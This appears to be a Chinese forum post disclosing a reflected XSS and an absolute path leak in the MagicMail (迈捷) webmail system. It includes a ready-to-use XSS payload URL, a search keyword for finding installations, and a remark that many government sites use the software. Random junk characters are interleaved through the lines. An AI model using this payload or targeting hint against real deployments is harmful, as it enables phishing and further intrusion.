今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞) E3 b9 G, O/ Q& Z' j) B5 I
! B% s9 b+ D$ C. R8 D/ U 6 ?* n, v; | w0 P* S4 d7 b
包含 一个反射性XSS 以及 绝对路径泄漏
, g8 _# z9 {' E% d; H/ ?6 l+ a7 r: K看了看 貌似全部是linux的。6 T l# r; G e2 P0 b
# \+ n! H7 X% w# L% ]关键字:迈捷邮件系统 by MagicMail
: X: b' I( g! J, Z$ A7 G! O4 z6 P) H$ a1 O* i& p
可以看到很多政府网站都用这个邮件系统
/ S U7 X6 r8 W9 d6 w# [3 I8 T' C1 O2 ^& h( E4 X
绝对路径 http://madman.in/index.php?login_type=declare&language=8 \. B' |& @5 q6 N
: T O: G' Y/ V7 ^$ v2 J7 u
0 g* h }! p; v! f1 X* S% `
7 }0 z! d1 Y# yXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
' F2 N4 n/ f' {1 s3 q, M* E- Y
1 e7 [9 X9 P7 w8 b2 d* L& z: t$ n3 H% E
+ [; V# s1 W* @* q1 O T5 D7 u虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等/ g( ?% ~" U, a: v- X
% I% w6 V+ p2 _0 A V+ r" I2 {, @/ B
修复方案:看官方补丁吧。, q5 z9 X! s \3 ]: \% T
|